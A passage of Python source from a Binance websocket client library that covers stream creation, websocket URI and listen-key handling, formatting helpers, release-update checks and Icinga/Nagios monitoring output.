:type api_key: str
:param api_secret: provide a valid Binance API secret
:type api_secret: str
:param symbols: provide the symbols for isolated_margin user_data streams
:type symbols: str
:param output: the default setting `raw_data` can be globaly overwritten with the parameter
`output_default <https://oliver-zehentleitner.github.io/unicorn-binance-websocket-api/unicorn_binance_websocket_api.html?highlight=output_default#module-unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager>`_
of BinanceWebSocketApiManager`. To overrule the `output_default` value for this specific stream,
set `output` to "dict" to convert the received raw data to a python dict, set to "UnicornFy" to
convert with `UnicornFy <https://github.com/oliver-zehentleitner/unicorn-fy>`_ - otherwise with
the default setting "raw_data" the output remains unchanged and gets delivered as received from
the endpoints
:type output: str
:param ping_interval: Once the connection is open, a `Ping frame` is sent every
`ping_interval` seconds. This serves as a keepalive. It helps keeping
the connection open, especially in the presence of proxies with short
timeouts on inactive connections. Set `ping_interval` to `None` to
disable this behavior. (default: 20)
This parameter is passed through to the `websockets.client.connect()
<https://websockets.readthedocs.io/en/stable/api.html?highlight=ping_interval#websockets.client.connect>`_
:type ping_interval: int or None
:param ping_timeout: If the corresponding `Pong frame` isn't received within
`ping_timeout` seconds, the connection is considered unusable and is closed with
code 1011. This ensures that the remote endpoint remains responsive. Set
`ping_timeout` to `None` to disable this behavior. (default: 20)
This parameter is passed through to the `websockets.client.connect()
<https://websockets.readthedocs.io/en/stable/api.html?highlight=ping_interval#websockets.client.connect>`_
:type ping_timeout: int or None
:param close_timeout: The `close_timeout` parameter defines a maximum wait time in seconds for
completing the closing handshake and terminating the TCP connection. (default: 10)
This parameter is passed through to the `websockets.client.connect()
<https://websockets.readthedocs.io/en/stable/api.html?highlight=ping_interval#websockets.client.connect>`_
:type close_timeout: int or None
:param stream_buffer_maxlen: Set a max len for the `stream_buffer`. Only used in combination with a non generic
`stream_buffer`. The generic `stream_buffer` uses always the value of
`BinanceWebSocketApiManager()`.
:type stream_buffer_maxlen: int or None
:return: stream_id or 'False'
"""
# create a stream
if isinstance(channels, bool):
logger.error(f"BinanceWebSocketApiManager.create_stream(" + str(channels) + ", " + str(markets) + ", "
+ str(stream_label) + ", " + str(stream_buffer_name) + ", " + str(symbols) + ", " +
str(stream_buffer_maxlen) + ") - Parameter "
f"`channels` must be str, tuple, list or a set!")
return False
elif isinstance(markets, bool):
if isinstance(channels, bool):
logger.error(f"BinanceWebSocketApiManager.create_stream(" + str(channels) + ", " + str(markets) + ", "
+ str(stream_label) + ", " + str(stream_buffer_name) + ", " + str(symbols) + ", " +
str(stream_buffer_maxlen) + ") - Parameter "
f"`markets` must be str, tuple, list or a set!")
return False
if type(channels) is str:
channels = [channels]
if type(markets) is str:
markets = [markets]
if output is False:
output = self.output_default
stream_id = uuid.uuid4()
markets_new = []
if stream_buffer_name is True:
stream_buffer_name = stream_id
for market in markets:
if "!" in market \
or market == "allMiniTickers" \
or market == "allTickers" \
or market == "blockheight" \
or market == "$all":
markets_new.append(market)
else:
if self.is_exchange_type('dex'):
if re.match(r'[a-zA-Z0-9]{41,43}', market) is None:
markets_new.append(str(market).upper())
else:
markets_new.append(str(market))
elif self.is_exchange_type('cex'):
markets_new.append(str(market).lower())
logger.info("BinanceWebSocketApiManager.create_stream(" + str(channels) + ", " + str(markets_new) + ", "
+ str(stream_label) + ", " + str(stream_buffer_name) + ", " + str(symbols) + ") with stream_id="
+ str(stream_id))
self._add_stream_to_stream_list(stream_id,
channels,
markets_new,
stream_label,
stream_buffer_name,
symbols=symbols,
api_key=api_key,
api_secret=api_secret,
output=output,
ping_interval=ping_interval,
ping_timeout=ping_timeout,
close_timeout=close_timeout,
stream_buffer_maxlen=stream_buffer_maxlen)
try:
loop = asyncio.new_event_loop()
except OSError as error_msg:
logger.critical(f"BinanceWebSocketApiManager.create_stream({str(channels)}, {str(markets_new)}, "
f"{str(stream_label)}, {str(stream_buffer_name)}, {str(symbols)}), {stream_buffer_maxlen} "
f"with stream_id="
f"{str(stream_id)} - OSError - can not create stream - error_msg: {str(error_msg)}")
return False
self.event_loops[stream_id] = loop
thread = threading.Thread(target=self._create_stream_thread, args=(loop,
stream_id,
channels,
markets_new,
stream_buffer_name,
stream_buffer_maxlen,
False))
thread.start()
return stream_id
def create_websocket_uri(self, channels, markets, stream_id=False, api_key=False, api_secret=False, symbols=False):
"""
Create a websocket URI
:param channels: provide the channels to create the URI
:type channels: str, tuple, list, set
:param markets: provide the markets to create the URI
:type markets: str, tuple, list, set
:param stream_id: provide a stream_id (only needed for userData Streams (acquiring a listenKey)
:type stream_id: uuid
:param api_key: provide a valid Binance API key
:type api_key: str
:param api_secret: provide a valid Binance API secret
:type api_secret: str
:param symbols: provide the symbols for isolated_margin user_data streams
:type symbols: str
:return: str or False
"""
if isinstance(channels, bool):
logger.error(f"BinanceWebSocketApiManager.create_websocket_uri({str(channels)}, {str(markets)}"
f", {str(symbols)}) - error_msg: Parameter `channels` must be str, tuple, list "
f"or a set!")
return False
elif isinstance(markets, bool):
logger.error(f"BinanceWebSocketApiManager.create_websocket_uri({str(channels)}, {str(markets)}"
f", {str(symbols)}) - error_msg: Parameter `markets` must be str, tuple, list "
f"or a set!")
return False
payload = []
if type(channels) is str:
channels = [channels]
if type(markets) is str:
markets = [markets]
if len(channels) == 1 and len(markets) == 1:
if "!userData" in channels or "!userData" in markets:
if stream_id is not False:
response = self.get_listen_key_from_restclient(stream_id, api_key, api_secret, symbols=symbols)
try:
if response['code'] == -1102 or \
response['code'] == -2008 or \
response['code'] == -2014 or \
response['code'] == -2015 or \
response['code'] == -11001:
# -1102 = Mandatory parameter 'symbol' was not sent, was empty/null, or malformed.
# -2008 = Invalid Api-Key ID
# -2014 = API-key format invalid
# -2015 = Invalid API-key, IP, or permissions for action
# -11001 = Isolated margin account does not exist.
logger.critical("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) +
", " + str(markets) + ", " + ", " + str(symbols) + ") - Received known "
"error code from rest client: " + str(response))
return response
else:
logger.critical("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) +
", " + str(markets) + ", " + ", " + str(symbols) + ") - Received unknown "
"error code from rest client: " + str(response))
return response
except KeyError:
pass
except TypeError:
pass
if response:
try:
uri = self.websocket_base_uri + "ws/" + str(response['listenKey'])
uri_hidden_secret = self.websocket_base_uri + "ws/" + self.replaced_secrets_text
if self.show_secrets_in_logs is True:
logger.info("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) +
", " + str(markets) + ", " + str(symbols) + ") - result: " + uri)
else:
logger.info("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) +
", " + str(markets) + ", " + str(symbols) + ") - result: " +
uri_hidden_secret)
self.stream_list[stream_id]['subscriptions'] = self.get_number_of_subscriptions(stream_id)
return uri
except KeyError:
logger.critical("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) + ", "
+ str(markets) + ", " + ", " + str(symbols) + ") - error_msg: can not "
"create URI!!")
return False
except TypeError:
logger.critical("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) + ", "
+ str(markets) + ", " + ", " + str(symbols) + ") - error_msg: can not "
"create URI!!")
return False
else:
logger.critical("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) + ", " +
str(markets) + ", " + ", " + str(symbols) + ") - error_msg: can not create "
"URI!!")
return False
else:
logger.critical("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) + ", " +
str(markets) + ", " + ", " + str(symbols) + ") - error_msg: can not create URI!!")
return False
elif "!bookTicker" in channels or "!bookTicker" in markets:
if stream_id:
self.stream_list[stream_id]['subscriptions'] = self.get_number_of_subscriptions(stream_id)
return self.websocket_base_uri + "ws/!bookTicker"
elif "arr" in channels or "$all" in markets:
if stream_id:
self.stream_list[stream_id]['subscriptions'] = self.get_number_of_subscriptions(stream_id)
return self.websocket_base_uri + "ws/" + markets[0] + "@" + channels[0]
elif "arr" in markets or "$all" in channels:
if stream_id:
self.stream_list[stream_id]['subscriptions'] = self.get_number_of_subscriptions(stream_id)
return self.websocket_base_uri + "ws/" + channels[0] + "@" + markets[0]
elif self.is_exchange_type("dex"):
if re.match(r'[a-zA-Z0-9]{41,43}', markets[0]) is not None:
try:
if self.stream_list[stream_id]['dex_user_address'] is False:
self.stream_list[stream_id]['dex_user_address'] = markets[0]
if self.stream_list[stream_id]['dex_user_address'] != markets[0]:
logger.error("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) + ", " +
str(markets) + ", " + ", " + str(symbols) + ") - Error: once set, the "
"dex_user_address is not allowed to get changed anymore!")
return False
except KeyError:
pass
add_payload = {"method": "subscribe",
"topic": channels[0],
"address": markets[0]}
payload.append(add_payload)
if stream_id:
self.stream_list[stream_id]['payload'] = payload
self.stream_list[stream_id]['subscriptions'] = self.get_number_of_subscriptions(stream_id)
return self.websocket_base_uri + "ws/" + markets[0]
elif markets[0] != "" and channels[0] != "":
return self.websocket_base_uri + "ws/" + markets[0] + "@" + channels[0]
else:
logger.error("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) + ", " +
str(markets) + ", " + ", " + str(symbols) + ") - Error: not able to create websocket "
"URI for DEX")
return False
if self.is_exchange_type("dex"):
query = "ws"
if stream_id:
payload = self.create_payload(stream_id, "subscribe", channels=channels, markets=markets)
self.stream_list[stream_id]['payload'] = payload
self.stream_list[stream_id]['subscriptions'] = self.get_number_of_subscriptions(stream_id)
return self.websocket_base_uri + str(query)
else:
query = "stream?streams="
final_market = "@arr"
market = ""
channel = ""
for market in markets:
if "arr@" in market:
final_market = "@" + market
final_channel = "@arr"
for channel in channels:
if "arr@" in channel:
final_channel = "@" + channel
for channel in channels:
if channel == "!userData":
logger.error("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) + ", " +
str(markets) + ", " + ", " + str(symbols) + ") - Can not create "
"'outboundAccountInfo' in a multi channel socket! "
"Unfortunately Binance only stream it in a single stream socket! ./"
"Use binance_websocket_api_manager.create_stream([\"arr\"], [\"!userData\"]) to "
"initiate an extra connection.")
return False
for market in markets:
if market == "!userData":
logger.error("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) + ", " +
str(markets) + ", " + ", " + str(symbols) + ") - Can not create "
"'outboundAccountInfo' in a multi channel socket! "
"Unfortunatly Binance only stream it in a single stream socket! ./"
"Use binance_websocket_api_manager.create_stream([\"arr\"], [\"!userData\"]) to "
"initiate an extra connection.")
return False
if "!" in channel:
query += channel + final_market
elif "!" in market:
query += market + final_channel
else:
query += market.lower() + "@" + channel
try:
if self.subscribe_to_stream(stream_id, markets=markets, channels=channels) is False:
sys.exit(1)
except KeyError:
pass
logger.info("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) + ", " +
str(markets) + ", " + ", " + str(symbols) + ") - Created websocket URI for stream_id=" +
str(stream_id) + " is " + self.websocket_base_uri + str(query))
return self.websocket_base_uri + str(query)
def delete_listen_key_by_stream_id(self, stream_id):
"""
Delete a binance listen_key from a specific !userData stream
:param stream_id: id of a !userData stream
:type stream_id: uuid
"""
try:
if self.stream_list[stream_id]['listen_key'] is not False:
logger.info("BinanceWebSocketApiManager.delete_listen_key_by_stream_id(" + str(stream_id) + ")")
self.restclient.delete_listen_key(stream_id)
except KeyError:
return False
def delete_stream_from_stream_list(self, stream_id):
"""
Delete a stream from the stream_list
Even if a stream crashes or get stopped, its data remains in the BinanceWebSocketApiManager till you stop the
BinanceWebSocketApiManager itself. If you want to tidy up the stream_list you can use this method.
:param stream_id: id of a stream
:type stream_id: uuid
:return: bool
"""
logger.info("BinanceWebSocketApiManager.delete_stream_from_stream_list(" + str(stream_id) + ")")
return self.stream_list.pop(stream_id, False)
def fill_up_space_left(self, demand_of_chars, string, filling=" "):
"""
Add whitespaces to `string` to a length of `demand_of_chars` on the left side
:param demand_of_chars: how much chars does the string have to have?
:type demand_of_chars: int
:param string: the string that has to get filled up with spaces
:type string: str
:param filling: filling char (default: blank space)
:type filling: str
:return: the filled up string
"""
blanks_pre = ""
blanks_post = ""
demand_of_blanks = demand_of_chars - len(str(string)) - 1
while len(blanks_pre) < demand_of_blanks:
blanks_pre += filling
blanks_post = filling
return blanks_pre + str(string) + blanks_post
def fill_up_space_centered(self, demand_of_chars, string, filling=" "):
"""
Add whitespaces to `string` to a length of `demand_of_chars`
:param demand_of_chars: how much chars does the string have to have?
:type demand_of_chars: int
:param string: the string that has to get filled up with spaces
:type string: str
:param filling: filling char (default: blank space)
:type filling: str
:return: the filled up string
"""
blanks_pre = ""
blanks_post = ""
demand_of_blanks = demand_of_chars - len(str(string)) - 1
while (len(blanks_pre)+len(blanks_post)) < demand_of_blanks:
blanks_pre += filling
if (len(blanks_pre) + len(blanks_post)) < demand_of_blanks:
blanks_post += filling
return blanks_pre + str(string) + blanks_post
def fill_up_space_right(self, demand_of_chars, string, filling=" "):
"""
Add whitespaces to `string` to a length of `demand_of_chars` on the right side
:param demand_of_chars: how much chars does the string have to have?
:type demand_of_chars: int
:param string: the string that has to get filled up with spaces
:type string: str
:param filling: filling char (default: blank space)
:type filling: str
:return: the filled up string
"""
blanks_pre = " "
blanks_post = ""
demand_of_blanks = demand_of_chars - len(str(string))
while len(blanks_post) < demand_of_blanks-1:
blanks_pre = filling
blanks_post += filling
string = blanks_pre + str(string) + blanks_post
return string[0:demand_of_chars]
def get_active_stream_list(self):
"""
Get a list of all active streams
:return: set or False
"""
# get the stream_list without stopped and crashed streams
stream_list_with_active_streams = {}
for stream_id in self.stream_list:
if self.stream_list[stream_id]['status'] == "running":
stream_list_with_active_streams[stream_id] = self.stream_list[stream_id]
try:
if len(stream_list_with_active_streams) > 0:
return stream_list_with_active_streams
except KeyError:
return False
except UnboundLocalError:
return False
def get_all_receives_last_second(self):
"""
Get the number of all receives of the last second
:return: int
"""
all_receives_last_second = 0
last_second_timestamp = int(time.time()) - 1
for stream_id in self.stream_list:
try:
all_receives_last_second += self.stream_list[stream_id]['receives_statistic_last_second']['entries'][
last_second_timestamp]
except KeyError:
pass
return all_receives_last_second
def get_binance_api_status(self):
"""
`get_binance_api_status()` is obsolete and will be removed in future releases, please use `get_used_weight()`
instead!
:return: dict
"""
logger.warning("`get_binance_api_status()` is obsolete and will be removed in future releases, please use"
"`get_used_weight()` instead!")
return self.binance_api_status
def get_used_weight(self):
"""
Get used_weight, last status_code and the timestamp of the last status update
:return: dict
"""
return self.binance_api_status
def get_current_receiving_speed(self, stream_id):
"""
Get the receiving speed of the last second in Bytes
:return: int
"""
current_timestamp = int(time.time())
last_timestamp = current_timestamp - 1
try:
if self.stream_list[stream_id]['transfer_rate_per_second']['bytes'][last_timestamp] > 0:
self.stream_list[stream_id]['transfer_rate_per_second']['speed'] = \
self.stream_list[stream_id]['transfer_rate_per_second']['bytes'][last_timestamp]
except TypeError:
return 0
except KeyError:
return 0
try:
current_receiving_speed = self.stream_list[stream_id]['transfer_rate_per_second']['speed']
except KeyError:
current_receiving_speed = 0
return current_receiving_speed
def get_current_receiving_speed_global(self):
"""
Get the receiving speed of the last second in Bytes from all streams!
:return: int
"""
current_receiving_speed = 0
try:
temp_stream_list = copy.deepcopy(self.stream_list)
except RuntimeError as error_msg:
logger.debug(f"BinanceWebSocketApiManager.get_current_receiving_speed_global() - RuntimeError: "
f"{str(error_msg)}")
return 0
except TypeError as error_msg:
logger.debug(f"BinanceWebSocketApiManager.get_current_receiving_speed_global() - RuntimeError: "
f"{str(error_msg)}")
return 0
for stream_id in temp_stream_list:
current_receiving_speed += self.get_current_receiving_speed(stream_id)
return current_receiving_speed
@staticmethod
def get_date_of_timestamp(timestamp):
"""
Convert a timestamp into a readable date/time format for humans
:param timestamp: provide the timestamp you want to convert into a date
:type timestamp: timestamp
:return: str
"""
date = str(datetime.utcfromtimestamp(timestamp).strftime('%Y-%m-%d, %H:%M:%S UTC'))
return date
def get_errors_from_endpoints(self):
"""
Get all the stored error messages from the ringbuffer sent by the endpoints.
:return: list
"""
return self.ringbuffer_error
def get_event_loop_by_stream_id(self, stream_id=False):
"""
Get the asyncio event loop used by a specific stream.
:return: asyncio event loop or False
"""
if stream_id is False:
return False
else:
return self.event_loops[stream_id]
def get_exchange(self):
"""
Get the name of the used exchange like "binance.com" or "binance.org-testnet"
:return: str
"""
return self.exchange
@staticmethod
def get_human_bytesize(bytes, suffix=""):
"""
Convert the bytes to something readable
:param bytes: amount of bytes
:type bytes: int
:param suffix: add a string after
:type suffix: str
:return:
"""
if bytes > 1024 * 1024 * 1024 *1024:
bytes = str(round(bytes / (1024 * 1024 * 1024 * 1024), 3)) + " tB" + suffix
elif bytes > 1024 * 1024 * 1024:
bytes = str(round(bytes / (1024 * 1024 * 1024), 2)) + " gB" + suffix
elif bytes > 1024 * 1024:
bytes = str(round(bytes / (1024 * 1024), 2)) + " mB" + suffix
elif bytes > 1024:
bytes = str(round(bytes / 1024, 2)) + " kB" + suffix
else:
bytes = str(bytes) + " B" + suffix
return bytes
@staticmethod
def get_human_uptime(uptime):
"""
Convert a timespan of seconds into hours, days, ...
:param uptime: Uptime in seconds
:type uptime: int
:return:
"""
if uptime > (60 * 60 * 24):
uptime_days = int(uptime / (60 * 60 * 24))
uptime_hours = int(((uptime - (uptime_days * (60 * 60 * 24))) / (60 * 60)))
uptime_minutes = int((uptime - ((uptime_days * (60 * 60 * 24)) + (uptime_hours * 60 * 60))) / 60)
uptime_seconds = int(
uptime - ((uptime_days * (60 * 60 * 24)) + ((uptime_hours * (60 * 60)) + (uptime_minutes * 60))))
uptime = str(uptime_days) + "d:" + str(uptime_hours) + "h:" + str(int(uptime_minutes)) + "m:" + str(
int(uptime_seconds)) + "s"
elif uptime > (60 * 60):
uptime_hours = int(uptime / (60 * 60))
uptime_minutes = int((uptime - (uptime_hours * (60 * 60))) / 60)
uptime_seconds = int(uptime - ((uptime_hours * (60 * 60)) + (uptime_minutes * 60)))
uptime = str(uptime_hours) + "h:" + str(int(uptime_minutes)) + "m:" + str(int(uptime_seconds)) + "s"
elif uptime > 60:
uptime_minutes = int(uptime / 60)
uptime_seconds = uptime - uptime_minutes * 60
uptime = str(uptime_minutes) + "m:" + str(int(uptime_seconds)) + "s"
else:
uptime = str(int(uptime)) + " seconds"
return uptime
@staticmethod
def get_latest_release_info():
"""
Get infos about the latest available release
:return: dict or False
"""
try:
respond = requests.get('https://api.github.com/repos/oliver-zehentleitner/unicorn-binance-websocket-api/'
'releases/latest')
latest_release_info = respond.json()
return latest_release_info
except Exception:
return False
@staticmethod
def get_latest_release_info_check_command():
"""
Get infos about the latest available `check_lucit_collector` release
:return: dict or False
"""
try:
respond = requests.get('https://api.github.com/repos/LUCIT-Development/check_lucit_collector.py/'
'releases/latest')
return respond.json()
except Exception:
return False
def get_latest_version(self):
"""
Get the version of the latest available release (cache time 1 hour)
:return: str or False
"""
# Do a fresh request if status is None or last timestamp is older 1 hour
if self.last_update_check_github['status'] is None or \
(self.last_update_check_github['timestamp']+(60*60) < time.time()):
self.last_update_check_github['status'] = self.get_latest_release_info()
if self.last_update_check_github['status']:
try:
return self.last_update_check_github['status']["tag_name"]
except KeyError:
return "unknown"
else:
return "unknown"
def get_latest_version_check_command(self):
"""
Get the version of the latest available `check_lucit_collector.py` release (cache time 1 hour)
:return: str or False
"""
# Do a fresh request if status is None or last timestamp is older 1 hour
if self.last_update_check_github_check_command['status'] is None or \
(self.last_update_check_github_check_command['timestamp'] + (60 * 60) < time.time()):
self.last_update_check_github_check_command['status'] = self.get_latest_release_info_check_command()
if self.last_update_check_github_check_command['status']:
try:
return self.last_update_check_github_check_command['status']["tag_name"]
except KeyError:
return "unknown"
else:
return "unknown"
def get_limit_of_subscriptions_per_stream(self):
"""
Get the number of allowed active subscriptions per stream (limit of binance API)
:return: int
"""
return self.max_subscriptions_per_stream
def get_number_of_all_subscriptions(self):
"""
Get the amount of all stream subscriptions
:return: inf
"""
subscriptions = 0
try:
active_stream_list = copy.deepcopy(self.get_active_stream_list())
if active_stream_list:
for stream_id in active_stream_list:
subscriptions += active_stream_list[stream_id]['subscriptions']
self.all_subscriptions_number = subscriptions
except TypeError:
return self.all_subscriptions_number
except RuntimeError:
return self.all_subscriptions_number
return subscriptions
def get_number_of_free_subscription_slots(self, stream_id):
"""
Get the number of free subscription slots (max allowed subscriptions - subscriptions) of a specific stream
:return: int
"""
free_slots = self.max_subscriptions_per_stream - self.stream_list[stream_id]['subscriptions']
return free_slots
def get_listen_key_from_restclient(self, stream_id, api_key, api_secret, symbols=False):
"""
Get a new or cached (<30m) listen_key
:param stream_id: provide a stream_id
:type stream_id: uuid
:param api_key: provide a valid Binance API key
:type api_key: str
:param api_secret: provide a valid Binance API secret
:type api_secret: str
:param symbols: provide the symbols for isolated_margin user_data streams
:type symbols: str
:return: str or False
"""
if (self.stream_list[stream_id]['start_time'] + self.stream_list[stream_id]['listen_key_cache_time']) > \
time.time() or (self.stream_list[stream_id]['last_static_ping_listen_key'] +
self.stream_list[stream_id]['listen_key_cache_time']) > time.time():
# listen_key is not older than 30 min
if self.stream_list[stream_id]['listen_key'] is not False:
response = {'listenKey': self.stream_list[stream_id]['listen_key']}
return response
# no cached listen_key or listen_key is older than 30 min
# acquire a new listen_key:
response = self.restclient.get_listen_key(stream_id)
if response:
# save and return the valid listen_key
try:
self.stream_list[stream_id]['listen_key'] = str(response['listenKey'])
return response
except KeyError:
# no valid listen_key, but a response from endpoint
return response
except TypeError:
return response
else:
# no valid listen_key
return False
def get_most_receives_per_second(self):
"""
Get the highest total receives per second value
:return: int
"""
return self.most_receives_per_second
def get_number_of_streams_in_stream_list(self):
"""
Get the number of streams that are stored in the stream_list
:return: int
"""
return len(self.stream_list)
def get_number_of_subscriptions(self, stream_id):
"""
Get the number of subscriptions of a specific stream
:return: int
"""
count_subscriptions = 0
for channel in self.stream_list[stream_id]['channels']:
if "!" in channel \
or channel == "orders" \
or channel == "accounts" \
or channel == "transfers" \
or channel == "allTickers" \
or channel == "allMiniTickers" \
or channel == "blockheight":
count_subscriptions += 1
continue
else:
for market in self.stream_list[stream_id]['markets']:
if "!" in market \
or market == "orders" \
or market == "accounts" \
or market == "transfers" \
or market == "allTickers" \
or market == "allMiniTickers" \
or market == "blockheight":
count_subscriptions += 1
else:
count_subscriptions += 1
return count_subscriptions
def get_keep_max_received_last_second_entries(self):
"""
Get the number of how much received_last_second entries are stored till they get deleted
:return: int
"""
return self.keep_max_received_last_second_entries
def get_monitoring_status_icinga(self, check_command_version=False, warn_on_update=True):
"""
Get status and perfdata to monitor and collect metrics with ICINGA/Nagios
status: OK, WARNING, CRITICAL
- WARNING: on restarts, available updates
- CRITICAL: crashed streams
perfdata:
- average receives per second since last status check
- average speed per second since last status check
- total received bytes since start
- total received length since start
- stream_buffer size
- stream_buffer length
- reconnects
- uptime
:param check_command_version: is the version of the calling `check_command <https://github.com/LUCIT-Development/check_lucit_collector.py>`_
:type check_command_version: str
:param warn_on_update: set to `False` to disable the update warning
:type warn_on_update: bool
:return: dict (text, time, return_code)
"""
result = self.get_monitoring_status_plain(check_command_version=check_command_version,
warn_on_update=warn_on_update)
if len(result['update_msg']) > 0 or len(result['status_msg']) > 0:
text_msg = " -" + str(result['status_msg']) + str(result['update_msg'])
else:
text_msg = ""
check_message = "BINANCE WEBSOCKETS (" + self.exchange + ") - " + result['status_text'] + ": O:" + \
str(result['active_streams']) + \
"/R:" + str(result['restarting_streams']) + "/C:" + str(result['crashed_streams']) + "/S:" + \
str(result['stopped_streams']) + text_msg + " | " + \
"active streams=" + str(result['active_streams']) + ";;;0 " + \
"average_receives_per_second=" + str(result['average_receives_per_second']) + \
";;;0 current_receiving_speed_per_second=" + str(result['average_speed_per_second']) + \
"KB;;;0 total_received_length=" + str(result['total_received_length']) + "c;;;0 total_" \
"received_size=" + str(result['total_received_mb']) + "MB;;;0 stream_buffer_size=" + \
str(result['stream_buffer_mb']) + "MB;;;0 stream_buffer_length=" + \
str(result['stream_buffer_items']) + ";;;0 reconnects=" + str(result['reconnects']) + "c;;;0 " \
"uptime_days=" + str(result['uptime']) + "c;;;0"
status = {'text': check_message,
'time': int(result['timestamp']),
'return_code': result['return_code']}
return status
def get_monitoring_status_plain(self, check_command_version=False, warn_on_update=True):
"""
Get plain monitoring status data:
active_streams, crashed_streams, restarting_streams, stopped_streams, return_code, status_text,
timestamp, update_msg, average_receives_per_second, average_speed_per_second, total_received_mb,
stream_buffer_items, stream_buffer_mb, reconnects, uptime
:param check_command_version: is the version of the calling `check_command <https://github.com/LUCIT-Development/check_lucit_collector.py>`_
:type check_command_version: False or str
:param warn_on_update: set to `False` to disable the update warning
:type warn_on_update: bool
:return: dict
"""
result = {}
result['active_streams'] = 0
result['crashed_streams'] = 0
result['restarting_streams'] = 0
result['highest_restart_per_stream_last_hour'] = 0
result['return_code'] = 0
result['status_text'] = "OK"
result['status_msg'] = ""
result['stopped_streams'] = 0
result['timestamp'] = time.time()
result['update_msg'] = ""
time_period = result['timestamp'] - self.last_monitoring_check
timestamp_last_hour = time.time() - (60*60)
try:
from unicorn_fy.unicorn_fy import UnicornFy
unicorn_fy = UnicornFy()
is_update_available_unicorn_fy = unicorn_fy.is_update_availabe()
except ModuleNotFoundError:
logger.critical("BinanceWebSocketApiManager.get_monitoring_status_plain() - UnicornFy not installed!")
is_update_available_unicorn_fy = False
except AttributeError:
logger.error("BinanceWebSocketApiManager.get_monitoring_status_plain() - UnicornFy outdated!")
is_update_available_unicorn_fy = True
if check_command_version:
is_update_available_check_command = self.is_update_availabe_check_command(
check_command_version=check_command_version)
else:
is_update_available_check_command = True
for stream_id in self.stream_list:
stream_restarts_last_hour = 0
for reconnect in self.stream_list[stream_id]['logged_reconnects']:
if reconnect > timestamp_last_hour:
stream_restarts_last_hour += 1
if stream_restarts_last_hour > result['highest_restart_per_stream_last_hour']:
result['highest_restart_per_stream_last_hour'] = stream_restarts_last_hour
for stream_id in self.stream_list:
if self.stream_list[stream_id]['status'] == "running":
result['active_streams'] += 1
elif self.stream_list[stream_id]['status'] == "stopped":
result['stopped_streams'] += 1
elif self.stream_list[stream_id]['status'] == "restarting":
result['restarting_streams'] += 1
elif "crashed" in self.stream_list[stream_id]['status']:
result['crashed_streams'] += 1
if self.is_update_availabe() and is_update_available_unicorn_fy and is_update_available_check_command:
result['update_msg'] = " Update available: UNICORN Binance WebSocket API, UnicornFy and " \
"check_lucit_collector.py!"
if warn_on_update is True:
result['status_text'] = "WARNING"
result['return_code'] = 1
elif self.is_update_availabe() and is_update_available_unicorn_fy:
result['update_msg'] = " Update available: UNICORN Binance WebSocket API and UnicornFy"
if warn_on_update is True:
result['status_text'] = "WARNING"
result['return_code'] = 1
elif self.is_update_availabe() and is_update_available_check_command:
result['update_msg'] = " Update available: UNICORN Binance WebSocket API and check_lucit_collector.py!"
if warn_on_update is True:
result['status_text'] = "WARNING"
result['return_code'] = 1
elif is_update_available_unicorn_fy and is_update_available_check_command:
result['update_msg'] = " Update available: UnicornFy and check_lucit_collector.py!"
if warn_on_update is True:
result['status_text'] = "WARNING"
result['return_code'] = 1
elif self.is_update_availabe():
result['update_msg'] = " Update " + str(self.get_latest_version()) + " available!"
if warn_on_update is True:
result['status_text'] = "WARNING"
result['return_code'] = 1
elif is_update_available_unicorn_fy:
result['update_msg'] = " Update UnicornFy " + str(unicorn_fy.get_latest_version()) + " available!"
if warn_on_update is True:
result['status_text'] = "WARNING"
result['return_code'] = 1
elif is_update_available_check_command:
result['update_msg'] = " Update `check_lucit_collector.py` " + \
str(self.get_latest_version_check_command()) + " available!"
if warn_on_update is True:
result['status_text'] = "WARNING"
result['return_code'] = 1
if result['highest_restart_per_stream_last_hour'] >= 10:
result['status_text'] = "CRITICAL"
result['return_code'] = 2
result['status_msg'] = " Restart rate per stream last hour: " + \
str(result['highest_restart_per_stream_last_hour'])
elif result['crashed_streams'] > 0:
result['status_text'] = "CRITICAL"
result['return_code'] = 2
elif result['highest_restart_per_stream_last_hour'] >= 3:
result['status_text'] = "WARNING"
result['return_code'] = 1
result['status_msg'] = " Restart rate per stream last hour: " + \
str(result['highest_restart_per_stream_last_hour'])
result['average_receives_per_second'] = ((self.total_receives - self.monitoring_total_receives) /
time_period).__round__(2)
result['average_speed_per_second'] = (((self.total_received_bytes - self.monitoring_total_received_bytes) /
time_period) / 1024).__round__(2)
result['total_received_mb'] = (self.get_total_received_bytes() / (1024 * 1024)).__round__(2)
result['total_received_length'] = self.total_receives
result['stream_buffer_items'] = str(self.get_stream_buffer_length())
result['stream_buffer_mb'] = (self.get_stream_buffer_byte_size() / (1024 * 1024)).__round__(4)
result['reconnects'] = self.get_reconnects()
self.monitoring_total_receives = self.get_total_receives()
self.monitoring_total_received_bytes = self.get_total_received_bytes()
self.last_monitoring_check = result['timestamp']
result['uptime'] = ((result['timestamp'] - self.start_time) / (60*60*24)).__round__(3)
return result
def get_process_usage_memory(self):
"""
Get the used memory of this process
:return: str
"""
process = psutil.Process(os.getpid())
memory = self.get_human_bytesize(process.memory_info()[0])
return memory
def get_process_usage_cpu(self):
"""
Get the used cpu power of this process
:return: int
"""
try:
cpu = psutil.cpu_percent(interval=None)
except OSError as error_msg:
logger.error(f"BinanceWebSocketApiManager.get_process_usage_cpu() - OSError - error_msg: {str(error_msg)}")
return False
return cpu
def get_process_usage_threads(self):
"""
Get the amount of threads that this process is using
:return: int
"""
threads = threading.active_count()
return threads
def get_reconnects(self):
"""
Get the number of total reconnects
:return: int
"""
return self.reconnects
def get_request_id(self):
"""
Get a unique `request_id`
:return: int
"""
with self.request_id_lock:
self.request_id += 1
return self.request_id
def get_result_by_request_id(self, request_id=False, timeout=10):
"""
Get the result related to the provided `request_id`
:param request_id: if you run `get_stream_subscriptions()
